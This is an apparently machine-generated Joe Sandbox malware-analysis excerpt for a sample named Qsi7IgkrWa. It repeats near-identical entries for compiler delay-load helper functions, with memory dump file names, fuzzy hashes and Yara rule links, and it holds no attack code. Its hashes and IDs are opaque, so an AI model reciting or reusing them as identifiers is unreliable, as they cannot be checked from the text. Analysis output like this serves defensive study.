Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d1770a1e324e8f74b572af423bcd6ed58d6bf5bcef4efa2107f146949e0dbd86
Instruction ID: 1b4af7f08f1fe431dabe9b37506327f37986e0d3b03d4ccf378938e8b87904cc
Opcode Fuzzy Hash: d1770a1e324e8f74b572af423bcd6ed58d6bf5bcef4efa2107f146949e0dbd86
Instruction Fuzzy Hash: 52B012E1259080FC320452071C03E3B01CCD1C1F1033040BEF826C0080EA40FF411831

Function 00BCE232 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4fa26e6b6acd78e2678f87d3757362217b13db4ba78024c7d67154d091c5bae5
Instruction ID: 5c79194ab9b7350d595d88d8ac2b38ef705e3833111c923e6ed7712018403b4c
Opcode Fuzzy Hash: 4fa26e6b6acd78e2678f87d3757362217b13db4ba78024c7d67154d091c5bae5
Instruction Fuzzy Hash: 5DB012E1299080FC320452061D03E3B01CCC1C1F1033040BEF826D0080EE40FF421831

Function 00BCE228 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9746a2b5ce971c77318c0f8b53005c5f60a0cb3425771a612112619f0dc732e2
Instruction ID: ebe9afa53eb7ece60b83248398ae2d47d1f341dc302e5d83d0275dc7fa0480d5
Opcode Fuzzy Hash: 9746a2b5ce971c77318c0f8b53005c5f60a0cb3425771a612112619f0dc732e2
Instruction Fuzzy Hash: BAB012E1259180FC324452061C03E3B05CCC1C1F1033041BEFC26C0080EA40FF811831

Function 00BCE21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0cc26f7b9f81c9cb02951977db8889dbb8ef2609c455ba066d9fa76f585baafe
Instruction ID: 180fc737d0dda7e33de09f99984ca1d58d645ddf3a929a43b5be4bebc2d388fc
Opcode Fuzzy Hash: 0cc26f7b9f81c9cb02951977db8889dbb8ef2609c455ba066d9fa76f585baafe
Instruction Fuzzy Hash: A7B012E1259080FC360452061C03E3B01CCC1C2F1033080BEFC26C0080EA40FF411831

Function 00BCE20A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: cc6760bb5b8db5684cb99a55f1fd5f8ee50fb729417968491ef4b110a43116f9
Instruction ID: f9ce9ad8b6068790d99df47c5456d7bf57fcc480ccaca805f32f45d79b77b5b5
Opcode Fuzzy Hash: cc6760bb5b8db5684cb99a55f1fd5f8ee50fb729417968491ef4b110a43116f9
Instruction Fuzzy Hash: 43B012D1399080FC310453061D03E3B01CCC2C2B1033080BEF825D0180ED50FF4A1831

Function 00BCE200 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2e2d9f3fc33ff08b1f33ca33ea63551c73f1c7128f9b3c04ed4625ed179aedc7
Instruction ID: 9260814bbd90ec47ebbd4cc223d90894424602df30275e52a5e05d62ed93211d
Opcode Fuzzy Hash: 2e2d9f3fc33ff08b1f33ca33ea63551c73f1c7128f9b3c04ed4625ed179aedc7
Instruction Fuzzy Hash: 18B012D13591C0FC314453061C03E3B05CCC2C2B1033081BEFC25C0180E940FE851831

Function 00BCE26E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d2bdc267af57553477d0944b0bedbc0ec601da3abf7b26cc8cbb0cdbb995eefb
Instruction ID: ddfae4301e63178638106524ed1ffa6ae445d4b851840cae4fd662700a7411f0
Opcode Fuzzy Hash: d2bdc267af57553477d0944b0bedbc0ec601da3abf7b26cc8cbb0cdbb995eefb
Instruction Fuzzy Hash: A6B012D1259080FC350452561C03E3B01DCC1C2B1033080BEFC25C0080EA40FE411831

Function 00BCE264 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b25ebcd16d3f12d675ccd49392a9cdcf35aef3917c6ebeb71f4cdb329ad103fd
Instruction ID: a143e8cde4dae8471ca7e9e8e12728a6604701d9b6afb2063b4ff234e0ce1e97
Opcode Fuzzy Hash: b25ebcd16d3f12d675ccd49392a9cdcf35aef3917c6ebeb71f4cdb329ad103fd
Instruction Fuzzy Hash: 95B012D126A0C0FC310452061C03E3B01CDD5C1B2033080BEF826C4080E940FE411831

Function 00BCE250 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 41485a1268b9e8958c273ebca12f875981b8f98fab7e9d4ffd565d26ed5cd125
Instruction ID: 3d19ef0607736038918308611f861589c84dcc64add09fd45fe4722b10550751
Opcode Fuzzy Hash: 41485a1268b9e8958c273ebca12f875981b8f98fab7e9d4ffd565d26ed5cd125
Instruction Fuzzy Hash: 74B012E125A1C0FC314453061C03E3B05CDC1C1B2033081BEFC25C4080E940FE851831

Function 00BCE246 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7522d30bcbfb51fc466fb88d0e909246e21c4f2b1e6716346030e95fa2bab786
Instruction ID: 5c026e44264e2e08f137a898f7704356a5f528b4c7f418f2d643a61110333a3c
Opcode Fuzzy Hash: 7522d30bcbfb51fc466fb88d0e909246e21c4f2b1e6716346030e95fa2bab786
Instruction Fuzzy Hash: 8DB012D125A0C0FC350452071C03E3B01CDC1C2B20330C0BEFC25C4080E940FE411831

Function 00BCE423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE3FC

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fe8e66525fcaaf3ae3d5215df3286b1a2f974b22dc2b60e8e5dee4dbda94d088
Instruction ID: 1d378572e2f0c935e7729736bdcd3eeab8913aea13f3ed2697872cd9db885f93
Opcode Fuzzy Hash: fe8e66525fcaaf3ae3d5215df3286b1a2f974b22dc2b60e8e5dee4dbda94d088
Instruction Fuzzy Hash: C2B012F12590C0FC374491051C03E3702CCC0C5F1033080EEF825C6080E840DE411437

Function 00BCE419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE3FC

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 13b92690347412917a7f19e71422bb6a799ebfcbce2d9b25092ed10e5427fe6b
Instruction ID: 14ab30df67a5df2dab5bcad517c4c32f76c59672ab74d8dcd63ad67870e0161d
Opcode Fuzzy Hash: 13b92690347412917a7f19e71422bb6a799ebfcbce2d9b25092ed10e5427fe6b
Instruction Fuzzy Hash: 61B012E13590C0FC324451051D03E7702CCC1C5B10330C0EEF525D6080E9409C4A1437

Function 00BCE44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE3FC

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c54fd58aa32e2c71ea8ed06d556868f6e41b1917379ad5727f0290034f232f10
Instruction ID: 4bddcff6cf00150d0cc82681ce71b3511d8f7d29452e4e15b1accc2e224ddfa5
Opcode Fuzzy Hash: c54fd58aa32e2c71ea8ed06d556868f6e41b1917379ad5727f0290034f232f10
Instruction Fuzzy Hash: 40B012E12590C0FC364491051C03E3702CCC1C5B10330C1EEF825C6080E940DC451437

Function 00BCE5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE580

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 582a3b9815b9b59857cd491cea252c3c208ea76bd1bb133c0934be9771dcfb33
Instruction ID: 8507298cd47a8a8015d8076622e23e676dbdd302e8e13c702244f338f6ec3d52
Opcode Fuzzy Hash: 582a3b9815b9b59857cd491cea252c3c208ea76bd1bb133c0934be9771dcfb33
Instruction Fuzzy Hash: ABB012C2269180FC314451555C07E3B05DCC0C1B1433042AEF824C2080F8408C811535

Function 00BCE5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE580

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
